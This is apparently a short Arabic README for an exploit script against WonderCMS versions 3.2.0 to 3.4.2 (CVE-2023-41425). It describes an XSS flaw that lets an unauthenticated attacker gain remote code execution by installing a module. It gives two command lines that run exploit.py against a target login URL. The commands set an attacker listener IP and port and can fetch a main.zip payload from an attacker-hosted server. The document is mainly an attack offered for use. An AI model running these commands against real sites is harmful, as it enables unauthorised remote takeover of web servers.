
WonderCMS RCE CVE-2023-41425
إصدارات WonderCMS من v3.2.0 إلى v3.4.2 التي تحتوي على ثغرة XSS تتيح لمهاجم خبيث تحقيق RCE عن طريق رفع مكوّن إلى installModule CVE-2023-41425 (لا حاجة لمعرفة كلمة المرور).
تحديد المضيف البعيد الذي يتم تنزيل ملف main.zip منه
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
أو عدم تحديد ملف main.zip. افتراضيًا، يتم التنزيل من main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
